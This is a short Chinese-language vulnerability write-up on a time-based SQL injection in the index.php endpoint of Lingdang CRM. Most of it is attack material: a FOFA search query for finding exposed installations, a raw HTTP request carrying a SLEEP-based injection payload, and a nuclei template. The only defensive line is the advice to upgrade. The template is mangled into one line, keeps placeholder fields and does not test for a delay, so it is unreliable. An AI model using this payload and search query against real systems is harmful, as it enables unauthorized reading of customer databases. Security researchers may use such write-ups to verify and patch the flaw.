免責申明

本文章僅供學習與交流，請勿用于非法用途，均由使用者本人負責，文章作者不為此承擔任何責任

漏洞描述

靈當CRM系統(tǒng)是一款功能全面、易于使用的客戶關(guān)系管理（CRM）軟件，由上海靈當信息科技有限公司開發(fā)。該系統(tǒng)專為以銷售和服務(wù)業(yè)務(wù)為主的中小型企業(yè)設(shè)計，旨在幫助這些企業(yè)實現(xiàn)銷售、服務(wù)、財務(wù)等一體化管理，提升整體運營效率，在index.php接口存在sql注入漏洞，通過延時注入可以獲取數(shù)據(jù)庫的數(shù)據(jù)

搜索語法

fofa

body="crmcommon/js/jquery/jquery-1.10.1.min.js"

漏洞復(fù)現(xiàn)

payload

GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(2)))x) HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36

nuclei

id: template-idinfo:name: Template Nameauthor: '30842'severity: infodescription: descriptionreference:- https://tags: tagshttp:- raw:- |+GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(2)))x) HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36matchers-condition: andmatchers:- type: wordpart: bodywords:- code- type: statusstatus:- 200

修復(fù)建議

升級到最新版本